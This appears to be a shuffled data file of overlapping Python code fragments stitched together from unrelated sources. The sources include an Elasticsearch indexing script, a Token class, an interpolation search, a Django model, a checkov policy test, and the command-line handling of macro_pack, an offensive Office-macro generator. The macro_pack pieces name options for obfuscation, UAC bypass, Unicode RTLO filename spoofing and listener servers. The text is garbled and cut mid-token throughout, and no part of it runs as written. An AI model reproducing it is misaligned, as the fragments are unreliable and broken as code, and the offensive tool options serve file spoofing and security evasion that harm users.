DATA_PATH text_corpus = [] def", "start_text = text.lstrip()[:LIMIT_START] with open(file_path.split('_text.txt')[0]+'_path.txt') as path_file: path = path_file.read().strip().replace(DATA_PATH,", "INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for hit in res['hits']['hits']:", "'%s' index...\" % (INDEX_NAME)) res = es.indices.create(index = INDEX_NAME, body", "'%s' index...\" % (INDEX_NAME)) res = es.indices.delete(index = INDEX_NAME) print(\"", "= INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}}) print(\"results:\") for hit in", "on Dec 8, 2019 .. codeauthor: <NAME> <<EMAIL>> Index docs", "Dec 8, 2019 .. codeauthor: <NAME> <<EMAIL>> Index docs into", "path, \"text\": text, \"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from", "response: '%s'\" % (res)) request_body = { \"settings\" : {", "response: '%s'\" % (res)) # bulk index the data print(\"bulk", "print(\"creating '%s' index...\" % (INDEX_NAME)) res = es.indices.create(index = INDEX_NAME,", "Index docs into ES https://qbox.io/blog/building-an-elasticsearch-index-with-python ''' from settings import *", "import re # n first characters for the doc preview", "the doc preview LIMIT_START = 100 txts_path = '%s/artdatis/tagging/OCRed/typed/' %", "text, \"start_text\": start_text}, } print(\"Loaded %d documents\"%len(text_corpus)) from elasticsearch import", "create index es = Elasticsearch(hosts = [ES_HOST]) if es.indices.exists(INDEX_NAME): print(\"deleting", "duplicates if text not in text_corpus: text_corpus.append(text) text = re.sub('", "documents\"%len(text_corpus)) from elasticsearch import Elasticsearch from elasticsearch.helpers import bulk #", "(res)) request_body = { \"settings\" : { \"number_of_shards\": 1, \"number_of_replicas\":", "file: text = file.read() # filter duplicates if text not", "the data print(\"bulk indexing...\") bulk(es, corpus_iterator()) # sanity check res", "check res = es.search(index = INDEX_NAME, size=2, body={\"query\": {\"match_all\": {}}})", "re # n first characters for the doc preview LIMIT_START", "\"number_of_replicas\": 0 } } print(\"creating '%s' index...\" % (INDEX_NAME)) res", "encoding=\"utf-8\") as file: text = file.read() # filter duplicates if", "= es.indices.create(index = INDEX_NAME, body = request_body) print(\" response: '%s'\"" ]
[ "a position, a game state, layer state, or some other", "Token is a button or other object on the table", "position, a game state, layer state, or some other piece", "state, layer state, or some other piece of info \"\"\"", "Token(object): def __init__(self, name, table): self.table = table self.name =", "is a button or other object on the table that", "or some other piece of info \"\"\" class Token(object): def", "def __init__(self, name, table): self.table = table self.name = name", "state, or some other piece of info \"\"\" class Token(object):", "info \"\"\" class Token(object): def __init__(self, name, table): self.table =", "that represents a position, a game state, layer state, or", "other piece of info \"\"\" class Token(object): def __init__(self, name,", "\"\"\" class Token(object): def __init__(self, name, table): self.table = table", "table): self.table = table self.name = name self.seat = None", "some other piece of info \"\"\" class Token(object): def __init__(self,", "class Token(object): def __init__(self, name, table): self.table = table self.name", "a button or other object on the table that represents", "name, table): self.table = table self.name = name self.seat =", "a game state, layer state, or some other piece of", "of info \"\"\" class Token(object): def __init__(self, name, table): self.table", "the table that represents a position, a game state, layer", "button or other object on the table that represents a", "table that represents a position, a game state, layer state,", "game state, layer state, or some other piece of info", "piece of info \"\"\" class Token(object): def __init__(self, name, table):", "A Token is a button or other object on the", "layer state, or some other piece of info \"\"\" class", "or other object on the table that represents a position,", "other object on the table that represents a position, a", "represents a position, a game state, layer state, or some", "object on the table that represents a position, a game", "\"\"\" A Token is a button or other object on", "__init__(self, name, table): self.table = table self.name = name self.seat", "on the table that represents a position, a game state," ]
[]
[ "1 else: index_of_last_element = mid_point - 1 store = [2,", "77] a = interpolation_search(store, 2) print(\"Index position of value 2", "- lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value -", "index_of_first_element, index_of_last_element, term ) if mid_point > index_of_last_element or mid_point", "lower_bound_index, upper_bound_index, search_value): return lower_bound_index + ( (upper_bound_index - lower_bound_index)", "index_of_last_element = size_of_list while index_of_first_element <= index_of_last_element: mid_point = nearest_mid(", "term > ordered_list[mid_point]: index_of_first_element = mid_point + 1 else: index_of_last_element", "term): size_of_list = len(ordered_list) - 1 index_of_first_element = 0 index_of_last_element", "= len(ordered_list) - 1 index_of_first_element = 0 index_of_last_element = size_of_list", "= interpolation_search(store, 2) print(\"Index position of value 2 is \",", "= size_of_list while index_of_first_element <= index_of_last_element: mid_point = nearest_mid( ordered_list,", "( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) ) *", ") if mid_point > index_of_last_element or mid_point < index_of_first_element: return", "+ 1 else: index_of_last_element = mid_point - 1 store =", "return lower_bound_index + ( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] -", "- input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list = len(ordered_list) - 1", "= [2, 4, 5, 12, 43, 54, 60, 77] a", "len(ordered_list) - 1 index_of_first_element = 0 index_of_last_element = size_of_list while", "= nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term ) if mid_point >", "size_of_list = len(ordered_list) - 1 index_of_first_element = 0 index_of_last_element =", "def interpolation_search(ordered_list, term): size_of_list = len(ordered_list) - 1 index_of_first_element =", "1 index_of_first_element = 0 index_of_last_element = size_of_list while index_of_first_element <=", "1 store = [2, 4, 5, 12, 43, 54, 60,", "<= index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term )", "// (input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index]) def", "if mid_point > index_of_last_element or mid_point < index_of_first_element: return None", "> ordered_list[mid_point]: index_of_first_element = mid_point + 1 else: index_of_last_element =", "search_value): return lower_bound_index + ( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index]", "index_of_last_element or mid_point < index_of_first_element: return None if ordered_list[mid_point] ==", "index_of_first_element = 0 index_of_last_element = size_of_list while index_of_first_element <= index_of_last_element:", "[2, 4, 5, 12, 43, 54, 60, 77] a =", "index_of_first_element <= index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term", "index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term ) if", "while index_of_first_element <= index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element,", "index_of_first_element = mid_point + 1 else: index_of_last_element = mid_point -", "mid_point + 1 else: index_of_last_element = mid_point - 1 store", "store = [2, 4, 5, 12, 43, 54, 60, 77]", "43, 54, 60, 77] a = interpolation_search(store, 2) print(\"Index position", "nearest_mid(input_list, lower_bound_index, upper_bound_index, search_value): return lower_bound_index + ( (upper_bound_index -", "= mid_point - 1 store = [2, 4, 5, 12,", "term: return mid_point if term > ordered_list[mid_point]: index_of_first_element = mid_point", ") * (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list =", "a = interpolation_search(store, 2) print(\"Index position of value 2 is", "- 1 store = [2, 4, 5, 12, 43, 54,", "else: index_of_last_element = mid_point - 1 store = [2, 4,", "def nearest_mid(input_list, lower_bound_index, upper_bound_index, search_value): return lower_bound_index + ( (upper_bound_index", "mid_point = nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term ) if mid_point", "54, 60, 77] a = interpolation_search(store, 2) print(\"Index position of", "= 0 index_of_last_element = size_of_list while index_of_first_element <= index_of_last_element: mid_point", "mid_point > index_of_last_element or mid_point < index_of_first_element: return None if", "< index_of_first_element: return None if ordered_list[mid_point] == term: return mid_point", "index_of_first_element: return None if ordered_list[mid_point] == term: return mid_point if", "interpolation_search(store, 2) print(\"Index position of value 2 is \", a)", "lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index])", "* (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list = len(ordered_list)", "or mid_point < index_of_first_element: return None if ordered_list[mid_point] == term:", "- input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term):", "+ ( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) )", "nearest_mid( ordered_list, index_of_first_element, index_of_last_element, term ) if mid_point > index_of_last_element", "lower_bound_index + ( (upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index])", "size_of_list while index_of_first_element <= index_of_last_element: mid_point = nearest_mid( ordered_list, index_of_first_element,", "(search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list = len(ordered_list) -", "= mid_point + 1 else: index_of_last_element = mid_point - 1", "input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list = len(ordered_list) - 1 index_of_first_element", "None if ordered_list[mid_point] == term: return mid_point if term >", "4, 5, 12, 43, 54, 60, 77] a = interpolation_search(store,", "(input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list,", "ordered_list, index_of_first_element, index_of_last_element, term ) if mid_point > index_of_last_element or", "mid_point < index_of_first_element: return None if ordered_list[mid_point] == term: return", "if term > ordered_list[mid_point]: index_of_first_element = mid_point + 1 else:", "ordered_list[mid_point] == term: return mid_point if term > ordered_list[mid_point]: index_of_first_element", "ordered_list[mid_point]: index_of_first_element = mid_point + 1 else: index_of_last_element = mid_point", "60, 77] a = interpolation_search(store, 2) print(\"Index position of value", "interpolation_search(ordered_list, term): size_of_list = len(ordered_list) - 1 index_of_first_element = 0", "index_of_last_element, term ) if mid_point > index_of_last_element or mid_point <", "mid_point - 1 store = [2, 4, 5, 12, 43,", "> index_of_last_element or mid_point < index_of_first_element: return None if ordered_list[mid_point]", "index_of_last_element = mid_point - 1 store = [2, 4, 5,", "if ordered_list[mid_point] == term: return mid_point if term > ordered_list[mid_point]:", "12, 43, 54, 60, 77] a = interpolation_search(store, 2) print(\"Index", "term ) if mid_point > index_of_last_element or mid_point < index_of_first_element:", "return mid_point if term > ordered_list[mid_point]: index_of_first_element = mid_point +", "== term: return mid_point if term > ordered_list[mid_point]: index_of_first_element =", "return None if ordered_list[mid_point] == term: return mid_point if term", "5, 12, 43, 54, 60, 77] a = interpolation_search(store, 2)", "(upper_bound_index - lower_bound_index) // (input_list[upper_bound_index] - input_list[lower_bound_index]) ) * (search_value", "0 index_of_last_element = size_of_list while index_of_first_element <= index_of_last_element: mid_point =", "mid_point if term > ordered_list[mid_point]: index_of_first_element = mid_point + 1", "input_list[lower_bound_index]) ) * (search_value - input_list[lower_bound_index]) def interpolation_search(ordered_list, term): size_of_list", "- 1 index_of_first_element = 0 index_of_last_element = size_of_list while index_of_first_element", "upper_bound_index, search_value): return lower_bound_index + ( (upper_bound_index - lower_bound_index) //" ]
[ "Projects(models.Model): project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created =", "django.db.models import Q from django.contrib.auth.models import User from django.urls import", "projects_per_user(self, user): return self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name =", "from django.db import models from django.db.models import Q from django.contrib.auth.models", "Q(project_owner=user.username) ) class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User,", "Q from django.contrib.auth.models import User from django.urls import reverse class", ") class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60)", "class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created", "= models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description", "user): return self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name = models.CharField(max_length=60)", "models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level =", "django.urls import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter(", "project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects", "class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter( Q(project_owner=user.username) ) class", "from django.db.models import Q from django.contrib.auth.models import User from django.urls", "= models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager() def __str__(self):", "return self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner", "max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0)", "project_name = models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True)", "self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name = models.CharField(max_length=60) project_owner =", "reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter( Q(project_owner=user.username) )", "import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter( Q(project_owner=user.username)", "ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return self.filter( Q(project_owner=user.username) ) class Projects(models.Model):", "def projects_per_user(self, user): return self.filter( Q(project_owner=user.username) ) class Projects(models.Model): project_name", "models.CharField(max_length=60) project_owner = models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description =", "from django.contrib.auth.models import User from django.urls import reverse class ProjectQuerySet(models.QuerySet):", "import Q from django.contrib.auth.models import User from django.urls import reverse", "import models from django.db.models import Q from django.contrib.auth.models import User", "from django.urls import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user): return", "User from django.urls import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self, user):", "project_owner = models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255)", "= models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects =", "project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager() def", "import User from django.urls import reverse class ProjectQuerySet(models.QuerySet): def projects_per_user(self,", "django.contrib.auth.models import User from django.urls import reverse class ProjectQuerySet(models.QuerySet): def", "= models.CharField(default=User, max_length=60) project_created = models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level", "models.DateTimeField(auto_now_add=True) project_description = models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager()", "models from django.db.models import Q from django.contrib.auth.models import User from", "models.CharField(max_length=255) project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager() def __str__(self): return", "django.db import models from django.db.models import Q from django.contrib.auth.models import", "project_level = models.IntegerField(default=0) objects = ProjectQuerySet.as_manager() def __str__(self): return str(self.pk)" ]
[ "checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner()", "= os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir =", "checks: {[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if __name__", "fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for fc", "check from checkov.serverless.runner import Runner from checkov.runner_filter import RunnerFilter class", "os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report =", "current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir", "summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for fc", "= Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] =", "runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"]", "TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) #", "RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner() current_dir =", "report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for fc in report.failed_checks]}\")", "f\"Failed checks: {[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped", "import check from checkov.serverless.runner import Runner from checkov.runner_filter import RunnerFilter", "Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] = \"*\"", "import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner() current_dir", "for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if __name__ == '__main__':", "runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path", "test_summary(self): runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used in", "import Runner from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self):", "\"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2,", "f\"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if", "fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for fc", "import unittest from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import Runner", "import os import unittest from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner", "{[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path", "self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'],", "checks: {[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks:", "from checkov.serverless.runner import Runner from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase):", "unittest from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import Runner from", "= \"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir,", "checks: {[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks:", "self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'],", "report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}\")", "\"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))", "in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for fc in", "from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner =", "# Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir +", "class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__))", "for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for", "test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary", "os import unittest from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import", "runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for", "2, f\"Passed checks: {[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6,", "def test_summary(self): runner = Runner() current_dir = os.path.dirname(os.path.realpath(__file__)) # Used", "checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import Runner from checkov.runner_filter import", "for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for", "from checkov.serverless.checks.function.aws.AdminPolicyDocument import check from checkov.serverless.runner import Runner from checkov.runner_filter", "current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary()", "in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed checks: {[fc.file_path for fc in", "{[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if __name__ ==", "fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0) if __name__ == '__main__': unittest.main()", "+ \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'],", "report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for fc in report.passed_checks]}\")", "= report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks: {[fc.file_path for fc in", "f\"Passed checks: {[fc.file_path for fc in report.passed_checks]}\") self.assertEqual(summary['failed'], 6, f\"Failed", "{[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path", "Runner from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def test_summary(self): runner", "Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\"", "checkov.serverless.runner import Runner from checkov.runner_filter import RunnerFilter class TestAdminPolicyDocument(unittest.TestCase): def", "6, f\"Failed checks: {[fc.file_path for fc in report.failed_checks]}\") self.assertEqual(summary['skipped'], 0,", "self.assertEqual(summary['skipped'], 0, f\"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'],", "in os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir + \"/example_AdminPolicyDocument\" report", "os.path.dirname(os.path.realpath(__file__)) # Used in os.environ[\"sneaky_var\"] = \"*\" test_files_dir = current_dir", "0, f\"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}\") self.assertEqual(summary['parsing_errors'], 0)", "= runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed checks:", "report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary = report.get_summary() self.assertEqual(summary['passed'], 2, f\"Passed", "= current_dir + \"/example_AdminPolicyDocument\" report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id])) summary =" ]
[ "opts: if opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames", "'nt' else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green'))", "mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo contains the extension we want to", "= True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\": try:", "mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen", "logging.error(\" [!] Could not find output folder %s.\" % os.path.dirname(mpSession.outputFilePath))", "or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile =", "some weird race condition logging.info(\" [-] Store std input in", "True mpSession.listenRoot = os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort", "payloadBuilder is not None: payloadBuilder.run() if MP_TYPE == \"Pro\": generator", "% mpSession.fileInput) logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\"", "# encoding: utf-8 import os import sys import getopt import", "mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel == \"INFO\":", "# {PyArmor Plugins} # use Colorama to make Termcolor work", "\"-f\" or opt== \"--input-file\": mpSession.fileInput = arg elif opt ==", "sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True elif opt==\"-s\" or", "extension we want to spoof, such as \"jpg\" logging.info(\" [+]", "4 or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\":", "help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg,", "os.system(\"cmd.exe /k \\\"%s\\\"\" % utils.getRunningApp()) # PyArmor Plugin: checkPlug() main(sys.argv[1:])", "opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames = True", "generator = ContainerGenerator(mpSession) generator.run() #run com attack if mpSession.runTarget: generator", "True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt", "= os.path.abspath(arg) elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg)", "else: logging.info(\" [-] Input file path: %s\" % mpSession.fileInput) if", "from common.utils import MSTypes from common.definitions import VERSION, LOGLEVEL if", "= os.path.abspath(arg) elif opt == \"--run-visible\": if sys.platform == \"win32\":", "pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\"", "mpSession.unicodeRtlo contains the extension we want to spoof, such as", "work on Windows too init() WORKING_DIR = \"temp\" BANNER =", "utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\" [!] ERROR: Invalid format for %s. Input", "opt==\"-t\" or opt==\"--template\": mpSession.template = arg elif opt == \"--listtemplates\":", "Termcolor work on Windows too init() WORKING_DIR = \"temp\" BANNER", "logLevel),format=\"%(message)s\", handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\") # check input", "== \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "mpSession.template = arg elif opt == \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0)", "os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not find output folder %s.\" %", "interrupt caught!\") logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\")", "the extension we want to spoof, such as \"jpg\" logging.info(\"", "if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() if MP_TYPE == \"Pro\":", "None: import time time.sleep(0.4) # Needed to avoid some weird", "extension to spoof in reverse order fileName += '\\u200b' +", "sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255:", "if mpSession.fileInput is None: # Argument not supplied, try to", "working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary work", "elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath = os.path.abspath(arg) elif opt", "< 4 or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif", "temporary folder logging.info(\" [-] Temporary working dir: %s\" % working_directory)", "sys import getopt import logging import shutil import psutil from", "from termcolor import colored # {PyArmor Protection Code} # {PyArmor", "colorama import init from termcolor import colored # {PyArmor Protection", "# Append extension to spoof in reverse order fileName +=", "piped logging.info(\" [-] Waiting for piped input feed...\") mpSession.stdinContent =", "race condition logging.info(\" [-] Store std input in file...\") f", "if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER) else: help.printUsage(BANNER,", "mpSession.outputFilePath) # Retrieve the right payload builder if mpSession.outputFileType !=", "not find output folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType", "if mpSession.Wlisten: Wlistener = WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\" [!]", "utils, mp_session, help from common.utils import MSTypes from common.definitions import", "mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() if MP_TYPE == \"Pro\": #run", "ContainerGenerator from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro", "# Append file extension fileName += fileExtension mpSession.outputFilePath = fileName", "on Windows too init() WORKING_DIR = \"temp\" BANNER = help.getToolPres()", "mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not", "session object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\":", "= True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\":", "opt==\"-l\" or opt==\"--listen\": mpSession.listen = True mpSession.listenRoot = os.path.abspath(arg) elif", "not supplied, try to get file content from stdin if", "initialize macro_pack session object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE", "EOF #sys.stdin.close() if sys.platform == \"win32\": sys.stdin = open(\"conIN$\") else:", "not mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory,", "elif opt==\"--uac-bypass\": mpSession.uacBypass = True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo", "Wlistener = WListenServer(mpSession) Wlistener.run() except Exception: logging.exception(\" [!] Exception caught!\")", "\"INFO\": os.system('cls' if os.name == 'nt' else 'clear') # Logging", "logging.info(\" [-] Target output format: %s\" % mpSession.outputFileType) elif not", 